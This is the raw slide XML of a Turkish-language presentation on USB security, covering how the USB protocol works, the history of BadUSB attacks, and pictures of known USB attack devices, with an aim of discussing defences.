            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>farklılıkları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>anlamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ilginç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>alternatifleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>keşfetmeyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karşı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kişinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kendini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>koruyabileceği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemlerden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bahsetmeyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>öneriyoruz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Hak5 USB Kauçuk Ducky Deluxe Alan Rehberi Kitap içinde Çevrim içi olarak  Türkiye Satın Alın. B073VRKJ7P">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA46B79-3AB6-4D2B-AEE1-F1DBFA8E5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408" y="2843441"/>
            <a:ext cx="1166510" cy="117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 name="Picture 4" descr="Homemade Hardware Keylogger/PHUKD Hybrid">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05397DF1-E47D-43B3-8B7F-4F630AE1D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408" y="5455088"/>
            <a:ext cx="1381699" cy="10397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6" descr="EvilDuino">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EE07B4-BB71-4064-8CD4-ACD8C9F3AF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27" t="28519" r="13861" b="10370"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7685663" y="4303450"/>
            <a:ext cx="1891218" cy="113887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8" descr="NSA Playset (@NSAPlayset) / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A69C33B3-7E3A-4B71-93D9-25FD998EFB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7777" y="2738299"/>
            <a:ext cx="1529938" cy="11474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10" descr="MAKE HID ATTACKS GREAT AGAIN">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7726D7E5-62F1-45BB-B3AE-AA8635BB1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5325" y="4244488"/>
            <a:ext cx="1512390" cy="839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14" descr="MouseJack' Attack Bites Non-Bluetooth Wireless Mice">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265C7566-DC25-49D5-8FA1-271CA956F6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5325" y="5442323"/>
            <a:ext cx="1529938" cy="10886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6" descr="USBKill V4 Kit | USBKill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E97EB822-3083-4044-B331-208C4D761C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3663" y="1181730"/>
            <a:ext cx="2227291" cy="14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5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A51-B735-463E-93C5-E1DCA8F234D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>USB Protokolü</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13F306B-6255-4D2A-831E-CF6923EFFA96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913794" y="2096063"/>
            <a:ext cx="5715605" cy="4609537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>USB protokolü </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>master-slave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> tarzında çalışır. İlk olarak, bir cihaz, bir USB ana bilgisayar denetleyicisi aracılığıyla bir bilgi işlem sistemine bağlanır. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Ana bilgisayar denetleyicisi (ana), USB aygıtından (bağımlı) tüm verileri ister. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>USB cihazına periyodik olarak bir veri talebi gönderilir ve cihazda varsa veriler bir USB arabelleğine yerleştirilir. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Bir sistem kesintisi gerçekleştirilir, ana bilgisayar denetleyicisi arabellekteki verileri okur ve iletişim süreci buradan yeniden başlar. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Her USB işlemi bir simge paketi, veri paketi ve durum paketi içerir. Belirteç paketi, ne tür bir veri akışının (yani okuma, yazma vb.) gerçekleşeceğini belirler. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Veri paketi, gerçek USB verilerini içerir. Durum paketi, önceki paketlerin doğru bir şekilde alınıp alınmadığını veya uç aygıtın şu anda durdurulmuş olup olmadığını veya paketleri alamadığını bildirir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9932EFD8-94F1-4C23-B4D1-F93FB4CA8217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7715191" y="2406576"/>
            <a:ext cx="2305168" cy="2863997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11990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C3E7AE0-959E-4CE3-8A0F-13965DFEF3B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="609600"/>
            <a:ext cx="10353761" cy="1326321"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>USB Güvenlik açıklarının keşfi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B829FE2-A1C6-4A84-903B-20CCF6CC22AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913794" y="2096064"/>
            <a:ext cx="7087205" cy="4304736"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, 2006'da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>keşfedilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayarların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>CDROM'larında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>depolanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>programları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>takıldığında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>otomatik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalıştırmasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağlayan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açığından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geliyor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, USB Switchblade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>adı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>verilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB'nin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>önceki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürümlerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yolunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açmıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>2014 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yılında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Black Hat Güvenlik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Konferansında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Almanya'nın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 'Güvenlik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Araştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Laboratuvarları'ndan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Karsten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Nohl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Jakob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Lell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>genellikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sahte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kurcalanması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilinen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bellenim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>alanına</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bulaşabilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırısını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>duyurdular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ağustos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 2014'te, Amerika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Birleşik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Devletleri'nde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>düzenlenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Black Hat Güvenlik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Konferansında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Alman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
